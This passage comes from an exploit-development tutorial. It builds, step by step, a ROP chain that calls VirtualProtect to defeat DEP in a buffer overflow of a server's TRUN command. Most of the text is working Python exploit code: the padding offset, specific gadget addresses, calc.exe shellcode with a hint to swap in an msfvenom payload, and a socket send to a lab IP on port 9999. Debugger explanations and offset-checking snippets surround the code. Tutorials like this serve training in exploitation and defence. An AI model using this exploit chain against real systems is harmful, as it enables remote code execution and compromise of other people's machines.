# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

The below screenshots show the stack and registers right before the pop ebp instruction. Notice that EIP is currently one address space above the current ESP. ESP right now contains a memory address that points to 0x50505050, which is our padding.

Disassembly window before execution:

Current state of the registers (EIP contains the address of the mov edx, ecx instruction at the moment):

The current state of the stack. ESP contains the memory address 0x0189FA3C, which points to 0x50505050:

Now, here is the state of the registers after all of the instructions except ret have been executed. EDX now contains the same value as ECX, and EBP contains our intended padding value of 0x50505050!:

Remember that we still need to increase EDX by four bytes. The ROP gadgets after the mov edx, ecx + pop ebp + ret take care of this:

Now we have the memory address of the return parameter placeholder in ECX, and the memory address of the lpAddress parameter placeholder in EDX. Let’s take a look at the stack for a second:

Right now, our shellcode is about 0x100 hex bytes, or about 256 decimal bytes, away from the current return and lpAddress placeholders. Remember when earlier we saved the old stack pointer into two registers: EAX and ECX? Recall also, that we have already manipulated the value of ECX to equal the address of the return parameter placeholder.

EAX still contains the original stack pointer value. What we need to do, is manipulate EAX to equal the location of our shellcode. Well, that isn’t entirely true. Recall in the updated POC, there is a padding variable of 250 NOPs. All we need is EAX to equal an address within those NOPS that come a bit before the shellcode, since the NOPs will slide into the shellcode.

What we need to do is increase EAX by about 0x100 (256 decimal) bytes, which should be close enough to our shellcode.

NOTE: This may change going forward. Depending on how many ROP gadgets we need for the ROP chain, our shellcode may get pushed farther down on the stack. If this happens, EAX would no longer be pointing to an area around our shellcode. Again, if this problem arises, we can just come back and repeat the process of adding to EAX again.

Here is a useful ROP gadget for this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We will need two of these instructions. Also, keep in mind- we have a pop ebp instruction in this ROP gadget. This chain of ROP gadgets should be laid out like this:

  • add eax

  • 0x41414141 (padding to be popped into EBP)
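Before trusting the 0x100 figure, it is worth adding up what sits between the saved stack pointer and the shellcode. The sketch below assumes EAX holds the address of the second DWORD of the first group of gadgets (the slot ESP was pointing at when push esp ran), and that the chain contains exactly the gadgets used so far plus one add eax gadget and its padding. The segment names are just labels:

```python
# Byte sizes of everything between the saved stack pointer (EAX) and the
# shellcode, in the order it is sent. Assumes EAX points at the second
# DWORD of the first group of gadgets.
segments = [
    ("rest of first gadgets", 2 * 4),               # mov eax, ecx ; add esp, 0x1C
    ("parameters",            6 * 4),               # VirtualProtect() + 5 DWORDs
    ("padding",               4),
    ("second gadgets",        (12 + 2 + 4 + 2) * 4),  # inc ecx x12, mov edx + pad,
                                                      # inc edx x4, add eax + pad
    ("nop sled",              250),
]

offsets = {}
position = 0
for name, size in segments:
    offsets[name] = (position, position + size)
    position += size

sled_start, sled_end = offsets["nop sled"]
target = 0x100                     # what add eax, 0x00000100 adds to EAX
in_sled = sled_start <= target < sled_end

print("NOP sled spans +0x%X to +0x%X" % (sled_start, sled_end))
print("EAX + 0x%X lands in the sled: %s" % (target, in_sled))
```

Under those assumptions, the sled starts 0x74 bytes past the saved stack pointer and runs to 0x16E, so a single add of 0x100 lands comfortably inside it. If more gadgets are added later, rerun the numbers.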

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after the VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

EAX now contains an address near our shellcode. When VirtualProtect() returns to that address, execution will slide down the NOP sled and into the shellcode:

Up until this point, you may have been asking yourself, “how the heck are those parameters going to get changed to what we want? We are already so far down the stack, and the parameters are already placed in memory!” Here is where the cool (well, cool to me) stuff comes in.

Let’s recall the state of our registers up until this point:

  • ECX: location of return address placeholder
  • EDX: location of lpAddress parameter placeholder
  • EAX: location of shellcode (NOPS in front of shellcode)
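
These register values follow from simple offset arithmetic on the payload layout. The sketch below (Python 3, with variable names that are purely illustrative) recomputes the offsets relative to the stack pointer saved by the push esp ; pop ecx gadget. It assumes the layout of the POC above and a hand-counted 20 DWORDs in rop2 at this stage:

```python
DWORD = 4

# Offsets are relative to the value saved by "push esp ; pop ecx", i.e. the
# address of the stack slot holding the "mov eax, ecx" gadget.
rop_after_save = 2 * DWORD    # "mov eax, ecx" and "add esp, 0x1C" slots
parameters_len = 6 * DWORD    # VirtualProtect pointer, return address, 4 arguments
padding_len = 4               # padding = "\x90" * 4

virtualprotect_slot = rop_after_save
return_slot = virtualprotect_slot + DWORD
lpaddress_slot = return_slot + DWORD

# "add esp, 0x1C" has to skip exactly the parameters plus the padding.
skipped_by_add_esp = parameters_len + padding_len

rop2_start = rop_after_save + skipped_by_add_esp
rop2_len = 20 * DWORD         # assumption: DWORDs in rop2 at this stage, counted by hand
sled_start = rop2_start + rop2_len
sled_end = sled_start + 250   # padding2 = "\x90" * 250

eax_offset = 0x100            # EAX after "add eax, 0x00000100"

print(hex(return_slot))                       # 0xc  -> twelve "inc ecx" gadgets
print(hex(lpaddress_slot))                    # 0x10 -> four more "inc edx" gadgets
print(hex(skipped_by_add_esp))                # 0x1c
print(sled_start <= eax_offset < sled_end)    # True: EAX lands in the NOP sled
```

If more gadgets are added to rop2 later, rop2_len grows and the last check is worth repeating.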

From here, we just want to change the values stored at the memory addresses held in ECX and EDX. Right now, those registers hold the addresses of the placeholders, but the placeholders themselves still contain junk values.

A mov dword ptr ds:[ecx], eax instruction accomplishes what we need. It takes the value in EAX (the shellcode address) and writes it to the DWORD (the size of an x86 register) located at the address held in ECX, which is the return address placeholder. ECX itself does not change; only the memory it points to does.

To clarify: we are not making ECX point to EAX. We are overwriting the return address placeholder on the stack with the address of the shellcode. That way, when VirtualProtect() returns, it returns into our shellcode.

We need to do the same with EDX, which currently holds the address of the lpAddress placeholder. That placeholder also needs to contain the shellcode address held in EAX, so a mov dword ptr ds:[edx], eax instruction is needed. It does the same thing as above, but uses EDX instead of ECX.
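
To make the semantics concrete, here is a small Python 3 sketch that emulates the two writes on a byte buffer standing in for the stack. The base address, the shellcode address, and the helper name are hypothetical and chosen only for illustration:

```python
import struct

BASE = 0x0018F000   # hypothetical address of the VirtualProtect() pointer slot

# The six DWORDs of the `parameters` block, placeholders included.
stack = bytearray(struct.pack('<6L', 0x77e22e15, 0x4c4c4c4c, 0x45454545,
                              0x03030303, 0x54545454, 0x62506060))

def mov_dword_ptr(memory, address, value):
    """Emulate `mov dword ptr [address], value` on the fake stack."""
    struct.pack_into('<L', memory, address - BASE, value)

ecx = BASE + 4      # address of the return address placeholder
edx = BASE + 8      # address of the lpAddress placeholder
eax = BASE + 0x100  # hypothetical address inside the NOP sled

mov_dword_ptr(stack, ecx, eax)   # mov dword ptr [ecx], eax
mov_dword_ptr(stack, edx, eax)   # mov dword ptr [edx], eax

slots = struct.unpack('<6L', stack)
print([hex(value) for value in slots])
```

Note that ECX and EDX keep their values; only the two placeholder slots in memory change.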

Here are two ROP gadgets to accomplish this:

0x6ff63bdb: mov dword [ecx], eax ; pop ebp ; ret  ;  msvcrt.dll
0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

As you can see, there are a few pop instructions that need to be accounted for. We will add some padding to the updated POC, found below, to compensate:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after the VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX by 0xC bytes (ECX currently holds the old ESP) so it equals the address of the VirtualProtect return address placeholder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

A look at the disassembly window as we have approached the first mov gadget:

A look at the stack before the gadget execution:

Look at that! The return address placeholder (originally filled with 0x4c4c4c4c) was successfully overwritten with the address of the shellcode area:

The next ROP gadget, mov dword ptr ds:[edx], eax, successfully updates the lpAddress parameter as well:

Awesome. We are halfway there!

One thing you may have noticed about the mov dword ptr ds:[edx], eax ROP gadget is its return instruction. Instead of a normal ret, the gadget ends with ret 0x000C.

The number that comes after ret is the number of additional bytes to remove from the stack once the return address has been popped. 0xC in decimal is 12, which is three 4-byte values on x86 (each 32-bit DWORD is 4 bytes; 4 bytes * 3 values = 12 total). These types of returns are normally used to “clean up” items on the stack. Essentially, this skips the next three DWORDs on the stack after the return is executed.

In any case, just as with pop, we will have to add some padding to compensate. First, the return instruction takes the value at the top of the stack at the time of the ret 0x000C instruction (which is the address of the next ROP gadget in the chain) and loads it into EIP. Execution then continues at that gadget as normal. That is why no padding is needed at that point. Only then does the 0x000C portion of the return kick in and remove the next three DWORDs from the stack. This is the reason why padding for a ret NUM instruction is placed directly after the address of the NEXT ROP gadget, instead of directly below the current gadget like pop padding.
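
The ordering is easier to see in a tiny emulation. The following Python 3 sketch models the stack as a list of DWORDs; the function name and the two gadget addresses are hypothetical stand-ins, not gadgets from this exploit:

```python
def ret_n(stack, esp, n=0):
    """Emulate `ret n` on a list of DWORDs; `esp` is an index into the list.

    Returns (new_eip, new_esp).
    """
    eip = stack[esp]   # the DWORD on top of the stack is loaded into EIP
    esp += 1           # ...and popped
    esp += n // 4      # only then is the immediate added to ESP
    return eip, esp

NEXT_GADGET = 0x11111111       # hypothetical address of the next gadget
FOLLOWING_GADGET = 0x22222222  # hypothetical address of the gadget after that
PAD = 0x41414141

# Stack as seen at the moment `retn 0x000C` executes.
stack = [NEXT_GADGET, PAD, PAD, PAD, FOLLOWING_GADGET]

eip, esp = ret_n(stack, 0, 0x0C)
print(hex(eip), esp)                   # the next gadget runs; ESP has skipped the padding

following_eip, _ = ret_n(stack, esp)   # the plain ret that ends the next gadget
print(hex(following_eip))
```

The three padding DWORDs sit between the next gadget's address and the one after it, which is exactly where they go in the ROP chain.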

This will be reflected and explained a bit better in the comments of the code for the updated POC that will include the size and flNewProtect parameters. In the meantime, let’s figure out what to do about the last two parameters we have not calculated.

Almost Home

Now all we have left to do is get the size parameter onto the stack (while compensating for the ret 0x000C instruction in the last ROP gadget).

Let’s make the size parameter 0x300 bytes (768 in decimal). This will easily be enough room for a useful piece of shellcode. Here, all we are going to do is spawn calc.exe, so for now 0x300 will do. The flNewProtect parameter should contain a value of 0x40 (PAGE_EXECUTE_READWRITE), which gives the memory page read, write, and execute permissions.
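
For reference, a few of the documented Windows memory protection constants are shown below as a Python 3 sketch. The variable names for the two target values are illustrative, and the shellcode length is an assumption based on the 16-byte calc.exe payload used in this post:

```python
# Memory protection constants accepted by VirtualProtect().
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40

size = 0x300                              # value for the size placeholder
fl_new_protect = PAGE_EXECUTE_READWRITE   # value for the flNewProtect placeholder

shellcode_len = 16                        # assumption: the calc.exe payload in the POC
print(size, hex(fl_new_protect), size >= shellcode_len)
```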

At a high level, we will do exactly what we did last time with the return and lpAddress parameters:

  • Zero out a register for calculations
  • Insert 0x300 into that register
  • Overwrite the current size parameter placeholder with this newly calculated value

Repeat.

  • Zero out a register for calculations
  • Insert 0x40 into that register
  • Overwrite the current flNewProtect parameter placeholder with this newly calculated value.

The first step is to find a gadget that will “zero out” a register. EAX is always a great place to do calculations, so here is a useful ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Remember, we now have to add padding for the last gadget’s ret 0x000C instruction. It will skip the three DWORDs that follow this gadget's address, so we insert three DWORDs of padding:

0x41414141
0x41414141
0x41414141

Then, we need to find a gadget to get 0x300 into EAX. We already have a suitable gadget from earlier in the chain, so we will reuse it:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We need to repeat that three times (0x100 * 3 = 0x300). Remember to add a DWORD of padding under each add eax, 0x00000100 gadget to compensate for the pop ebp instruction.

The last step is writing the value to the stack.

Right now, EDX (the register itself) still holds the address of the lpAddress parameter placeholder. We will increase EDX by four bytes so that it reaches the size parameter placeholder, reusing an existing ROP gadget four times:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Now, we repeat what we did earlier and write the value in EAX (the correct size value) to the DWORD at the address held in EDX (the size parameter placeholder), reusing a previous ROP gadget:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Once more, that pesky ret 0x000C is present. Make sure to keep a note of that. Also note the two pop instructions. Add padding to compensate there as well.

Since the process is exactly the same, we will go ahead and knock out the flNewProtect parameter. Start by “zeroing out” EAX with an already found ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Again, we have to add padding for the last gadget’s ret 0x000C instruction. Three DWORDs will be skipped, so three DWORDs of padding are needed:

0x41414141
0x41414141
0x41414141

Next we need the value of 0x40 in EAX. I could not find a viable gadget among those I enumerated that would add 0x40 directly. So instead, in typical ROP fashion, I had to make do with what I had.

I added A LOT of add eax, 0x02 instructions (32 of them, since 0x02 * 32 = 0x40). Here is the ROP gadget used:

0x77bd6b18: add eax, 0x02 ; ret  ;  RPCRT4.dll
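
Rather than pasting the same line dozens of times, the repetition counts can be computed and the gadgets packed in a loop. This is only a sketch in Python 3 (where struct.pack returns bytes rather than the Python 2 strings used in the POC), and repeat_gadget is a hypothetical helper, not part of the original exploit:

```python
import struct

def repeat_gadget(address, count, pops=0, filler=0x41414141):
    """Pack `count` copies of a gadget, each followed by `pops` filler DWORDs."""
    one = struct.pack('<L', address) + struct.pack('<L', filler) * pops
    return one * count

ADD_EAX_0X100 = 0x6ff7e29a   # add eax, 0x00000100 ; pop ebp ; ret
ADD_EAX_0X02 = 0x77bd6b18    # add eax, 0x02 ; ret

size_count = 0x300 // 0x100      # gadgets needed to reach the size value
protect_count = 0x40 // 0x02     # gadgets needed to reach the flNewProtect value

size_chain = repeat_gadget(ADD_EAX_0X100, size_count, pops=1)
protect_chain = repeat_gadget(ADD_EAX_0X02, protect_count)

print(size_count, protect_count, len(size_chain), len(protect_chain))
# 3 32 24 128
```

The pops argument accounts for the filler DWORD each pop ebp consumes. The padding for a preceding ret 0x000C still has to be placed by hand after the first gadget address.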

EDX now holds the address of the size parameter placeholder. Increment EDX by four again so that it holds the address of the flNewProtect placeholder:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Last but not least, write the value in EAX (the flNewProtect value) to the DWORD at the address held in EDX (the flNewProtect placeholder):

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll
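
Taken together, the two passes can be emulated in a few lines. The Python 3 sketch below walks EDX across a fake copy of the parameters block and performs the same writes; the base and shellcode addresses are hypothetical, and the return address and lpAddress slots are assumed to be patched already:

```python
import struct

BASE = 0x0018F000          # hypothetical address of the VirtualProtect() pointer slot
SHELLCODE = BASE + 0x100   # hypothetical address inside the NOP sled

stack = bytearray(struct.pack('<6L', 0x77e22e15, SHELLCODE, SHELLCODE,
                              0x03030303, 0x54545454, 0x62506060))

def write_dword(address, value):
    """Emulate `mov dword [address], value` on the fake stack."""
    struct.pack_into('<L', stack, address - BASE, value)

edx = BASE + 8             # EDX still holds the address of the lpAddress placeholder

for value in (0x300, 0x40):    # size first, then flNewProtect
    eax = 0                    # xor eax, eax
    eax += value               # the repeated add eax gadgets
    edx += 4                   # four inc edx gadgets
    write_dword(edx, eax)      # mov dword [edx], eax

patched = struct.unpack('<6L', stack)
print([hex(value) for value in patched])
```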

Updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after the VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX by 0xC bytes (ECX currently holds the old ESP) so it equals the address of the VirtualProtect return address placeholder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
